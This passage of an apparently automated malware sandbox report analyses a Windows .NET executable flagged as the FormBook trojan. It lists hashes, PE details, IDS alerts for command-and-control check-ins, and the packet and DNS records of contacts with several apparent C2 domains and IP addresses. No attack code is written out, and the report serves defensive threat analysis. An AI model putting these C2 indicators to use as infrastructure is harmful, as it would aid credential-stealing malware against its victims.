                                                                  		theseattlenotary.comCanada
                                                                  		22612NAMECHEAP-NETUSfalse
                                                                  216.172.172.208
                                                                  		oinfoproduto.comUnited States
                                                                  		46606UNIFIEDLAYER-AS-1USfalse

                                                                  General Information

                                                                  Joe Sandbox Version:33.0.0 White Diamond
                                                                  Analysis ID:491544
                                                                  Start date:27.09.2021
                                                                  Start time:17:30:16
                                                                  Joe Sandbox Product:CloudBasic
                                                                  Overall analysis duration:0h 12m 42s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Sample file name:ejecutable1.exe
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                  Number of analysed new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • HDC enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.evad.winEXE@6/0@11/8
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HDC Information:
                                                                  • Successful, ratio: 21.3% (good quality ratio 20.5%)
                                                                  • Quality average: 72.8%
                                                                  • Quality standard deviation: 27.8%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 127
                                                                  • Number of non-executed functions: 26
                                                                  Cookbook Comments:
                                                                  • Adjust boot time
                                                                  • Enable AMSI
                                                                  • Found application associated with file extension: .exe
                                                                  Warnings:
                                                                  Show All
                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                  • Report size getting too big, too many NtEnumerateValueKey calls found.
                                                                  • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  17:31:14API Interceptor70x Sleep call for process: ejecutable1.exe modified
                                                                  17:31:36API Interceptor194x Sleep call for process: msdt.exe modified
                                                                  17:32:08API Interceptor1x Sleep call for process: explorer.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  No context

                                                                  Domains

                                                                  No context

                                                                  ASN

                                                                  No context

                                                                  JA3 Fingerprints

                                                                  No context

                                                                  Dropped Files

                                                                  No context

                                                                  Created / dropped Files

                                                                  No created / dropped files found

                                                                  Static File Info

                                                                  General

                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                  Entropy (8bit):6.737665264052285
                                                                  TrID:
                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                  File name:ejecutable1.exe
                                                                  File size:840192
                                                                  MD5:ff2724ddf0ef0525e9e419db5199e96f
                                                                  SHA1:3cda3d12e93a6e06f22e205010cb6c3d674285a1
                                                                  SHA256:5a5510cd8e0b77c01caac5b519c66d07d1621682e08179ead01adbc8d517b913
                                                                  SHA512:262a0900141207cd427a56b89a0ddf6dd81da957e7015069833662b450608a0a94551692d06bfb01d060c7f4cd5324dd2f3bf6ca36fd02ccdfc2f1b87b48353f
                                                                  SSDEEP:12288:gH/yso4G0/mo1M3d08zo70QuynqopwCtKbvygfgGvSwpNM6M9MvWdo9S7LCn1tM4:ULzIFXF+FxViEoP+h/CshCU6+S
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....NQa..............0..8...........W... ...`....@.. ....................... ............@................................

                                                                  File Icon

                                                                  Icon Hash:138e8eccece8cccc

                                                                  Static PE Info

                                                                  General

                                                                  Entrypoint:0x4b57ae
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                  Time Stamp:0x61514EA3 [Mon Sep 27 04:54:59 2021 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:v4.0.30319
                                                                  OS Version Major:4
                                                                  OS Version Minor:0
                                                                  File Version Major:4
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:4
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                  Entrypoint Preview

                                                                  Instruction
                                                                  jmp dword ptr [00402000h]
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al
                                                                  add byte ptr [eax], al

                                                                  Data Directories

                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xb575c0x4f.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb60000x19414.rsrc
                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000xc.reloc
                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                  Sections

                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                  .text0x20000xb37b40xb3800False0.669535602368data6.99789102279IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                  .rsrc0xb60000x194140x19600False0.391635237069data4.29441902576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                  .reloc0xd00000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                  NameRVASizeTypeLanguageCountry
                                                                  RT_ICON0xb61800x10828dBase IV DBT, blocks size 0, block length 2048, next free block index 40, next free block 0, next used block 0
                                                                  RT_ICON0xc69b80x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 4294967295, next used block 4294967295
                                                                  RT_ICON0xcabf00x25a8data
                                                                  RT_ICON0xcd1a80x10a8data
                                                                  RT_ICON0xce2600x468GLS_BINARY_LSB_FIRST
                                                                  RT_GROUP_ICON0xce6d80x4cdata
                                                                  RT_VERSION0xce7340x31cdata
                                                                  RT_MANIFEST0xcea600x9b0XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF, LF line terminators

                                                                  Imports

                                                                  DLLImport
                                                                  mscoree.dll_CorExeMain

                                                                  Version Infos

                                                                  DescriptionData
                                                                  Translation0x0000 0x04b0
                                                                  LegalCopyrightCopyright F@Soft
                                                                  Assembly Version1.0.6.2
                                                                  InternalNameIDLFL.exe
                                                                  FileVersion1.0.6.0
                                                                  CompanyNameF@Soft
                                                                  LegalTrademarks
                                                                  Comments
                                                                  ProductNameDarwin AW
                                                                  ProductVersion1.0.6.0
                                                                  FileDescriptionDarwin AW
                                                                  OriginalFilenameIDLFL.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                  09/27/21-17:31:56.380230TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916580192.168.2.2234.102.136.180
                                                                  09/27/21-17:31:56.380230TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916580192.168.2.2234.102.136.180
                                                                  09/27/21-17:31:56.380230TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916580192.168.2.2234.102.136.180
                                                                  09/27/21-17:31:56.559994TCP1201ATTACK-RESPONSES 403 Forbidden804916534.102.136.180192.168.2.22
                                                                  09/27/21-17:32:24.141268TCP2031453ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22162.0.232.162
                                                                  09/27/21-17:32:24.141268TCP2031449ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22162.0.232.162
                                                                  09/27/21-17:32:24.141268TCP2031412ET TROJAN FormBook CnC Checkin (GET)4916980192.168.2.22162.0.232.162
                                                                  09/27/21-17:33:11.306293TCP2031453ET TROJAN FormBook CnC Checkin (GET)4917480192.168.2.2293.185.100.223
                                                                  09/27/21-17:33:11.306293TCP2031449ET TROJAN FormBook CnC Checkin (GET)4917480192.168.2.2293.185.100.223
                                                                  09/27/21-17:33:11.306293TCP2031412ET TROJAN FormBook CnC Checkin (GET)4917480192.168.2.2293.185.100.223

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2021 17:31:56.365921974 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.379745007 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.379933119 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.380229950 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.393846989 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.559993982 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.560043097 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:31:56.560276031 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.560431004 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.874114037 CEST4916580192.168.2.2234.102.136.180
                                                                  Sep 27, 2021 17:31:56.887252092 CEST804916534.102.136.180192.168.2.22
                                                                  Sep 27, 2021 17:32:01.604357958 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:01.790163994 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:01.790251017 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:01.790482998 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:01.975771904 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:02.171308994 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:02.172131062 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:02.172543049 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:02.172714949 CEST4916680192.168.2.22184.168.131.241
                                                                  Sep 27, 2021 17:32:02.358375072 CEST8049166184.168.131.241192.168.2.22
                                                                  Sep 27, 2021 17:32:07.351763964 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:07.490724087 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:07.490979910 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:07.491132975 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:07.637655973 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:08.474100113 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:08.474483967 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:08.475579977 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:08.475658894 CEST4916780192.168.2.22216.172.172.208
                                                                  Sep 27, 2021 17:32:08.614156961 CEST8049167216.172.172.208192.168.2.22
                                                                  Sep 27, 2021 17:32:18.621284962 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.784785032 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:18.784881115 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.785186052 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.948822021 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:18.948857069 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:18.949249029 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:18.949389935 CEST4916880192.168.2.22162.0.229.241
                                                                  Sep 27, 2021 17:32:19.124420881 CEST8049168162.0.229.241192.168.2.22
                                                                  Sep 27, 2021 17:32:23.974770069 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.140935898 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.141038895 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.141268015 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.307697058 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.308247089 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:24.472944975 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.971518993 CEST8049169162.0.232.162192.168.2.22
                                                                  Sep 27, 2021 17:32:24.971777916 CEST4916980192.168.2.22162.0.232.162
                                                                  Sep 27, 2021 17:32:29.437037945 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.449552059 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.449654102 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.450268984 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.462723017 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531821966 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531872034 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531902075 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531925917 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.531981945 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532022953 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532075882 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532104969 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532128096 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532143116 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532151937 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532176971 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.532182932 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.532246113 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.544748068 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.545041084 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546432018 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546521902 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546693087 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546752930 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546894073 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546921015 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.546953917 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.546981096 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.547769070 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.547871113 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548048019 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548121929 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548507929 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548538923 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.548590899 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.548613071 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549474001 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549506903 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.549559116 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.549582005 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550220013 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550304890 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.550311089 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.550389051 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551467896 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551501989 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.551544905 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.551579952 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.552293062 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.552325964 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.552392960 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.552432060 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.553361893 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.553414106 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.553453922 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.553544044 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.557595015 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.557634115 CEST8049170216.239.32.21192.168.2.22
                                                                  Sep 27, 2021 17:32:29.557678938 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:29.557704926 CEST4917080192.168.2.22216.239.32.21
                                                                  Sep 27, 2021 17:32:39.823616028 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:39.962132931 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:39.962272882 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:39.962572098 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:40.100543976 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:40.120680094 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:40.121340036 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:40.259923935 CEST8049171162.251.85.174192.168.2.22
                                                                  Sep 27, 2021 17:32:40.260226011 CEST4917180192.168.2.22162.251.85.174
                                                                  Sep 27, 2021 17:32:45.201394081 CEST4917280192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:32:48.202733994 CEST4917280192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:32:54.209279060 CEST4917280192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:33:08.178561926 CEST4917380192.168.2.22101.35.124.222
                                                                  Sep 27, 2021 17:33:11.183537006 CEST4917380192.168.2.22101.35.124.222

                                                                  UDP Packets

                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                  Sep 27, 2021 17:31:56.314769983 CEST5216753192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:31:56.350986958 CEST53521678.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:01.560457945 CEST5059153192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:01.602639914 CEST53505918.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:07.176561117 CEST5780553192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:07.350603104 CEST53578058.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:13.513216972 CEST5903053192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:13.579324961 CEST53590308.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:18.581300020 CEST5918553192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:18.620323896 CEST53591858.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:23.948707104 CEST5561653192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:23.973058939 CEST53556168.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:29.351190090 CEST4997253192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:29.435094118 CEST53499728.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:39.564275026 CEST5177153192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:39.821504116 CEST53517718.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:32:45.154223919 CEST5986753192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:32:45.198246956 CEST53598678.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:33:08.122895002 CEST5031553192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:33:08.168354034 CEST53503158.8.8.8192.168.2.22
                                                                  Sep 27, 2021 17:33:11.236748934 CEST5007253192.168.2.228.8.8.8
                                                                  Sep 27, 2021 17:33:11.279463053 CEST53500728.8.8.8192.168.2.22

                                                                  DNS Queries

                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                  Sep 27, 2021 17:31:56.314769983 CEST192.168.2.228.8.8.80x8eb8Standard query (0)www.wwiilive.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:01.560457945 CEST192.168.2.228.8.8.80xc18cStandard query (0)www.dunedinhyperlocal.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:07.176561117 CEST192.168.2.228.8.8.80xfc43Standard query (0)www.oinfoproduto.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:13.513216972 CEST192.168.2.228.8.8.80x9c63Standard query (0)www.institutosamar.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:18.581300020 CEST192.168.2.228.8.8.80x30e0Standard query (0)www.multicoininvestment.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:23.948707104 CEST192.168.2.228.8.8.80x9037Standard query (0)www.theseattlenotary.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:29.351190090 CEST192.168.2.228.8.8.80xce43Standard query (0)www.petersonmovingco.comA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:39.564275026 CEST192.168.2.228.8.8.80xb02bStandard query (0)www.quinnwebster.topA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:45.154223919 CEST192.168.2.228.8.8.80x43f4Standard query (0)www.lianxiwan.xyzA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:08.122895002 CEST192.168.2.228.8.8.80x9ff7Standard query (0)www.lianxiwan.xyzA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:33:11.236748934 CEST192.168.2.228.8.8.80x1d11Standard query (0)www.area-arquitectos.comA (IP address)IN (0x0001)

                                                                  DNS Answers

                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                  Sep 27, 2021 17:31:56.350986958 CEST8.8.8.8192.168.2.220x8eb8No error (0)www.wwiilive.comwwiilive.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:31:56.350986958 CEST8.8.8.8192.168.2.220x8eb8No error (0)wwiilive.com34.102.136.180A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:01.602639914 CEST8.8.8.8192.168.2.220xc18cNo error (0)www.dunedinhyperlocal.comdunedinhyperlocal.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:01.602639914 CEST8.8.8.8192.168.2.220xc18cNo error (0)dunedinhyperlocal.com184.168.131.241A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:07.350603104 CEST8.8.8.8192.168.2.220xfc43No error (0)www.oinfoproduto.comoinfoproduto.comCNAME (Canonical name)IN (0x0001)
                                                                  Sep 27, 2021 17:32:07.350603104 CEST8.8.8.8192.168.2.220xfc43No error (0)oinfoproduto.com216.172.172.208A (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:13.579324961 CEST8.8.8.8192.168.2.220x9c63Name error (3)www.institutosamar.comnonenoneA (IP address)IN (0x0001)
                                                                  Sep 27, 2021 17:32:18.620323896 CEST8.8.8.8192.168.2.220x30e0No error (0)www.multicoininvestment.commulticoininvestment.comCNAME (Canonical name)IN (0x0001)
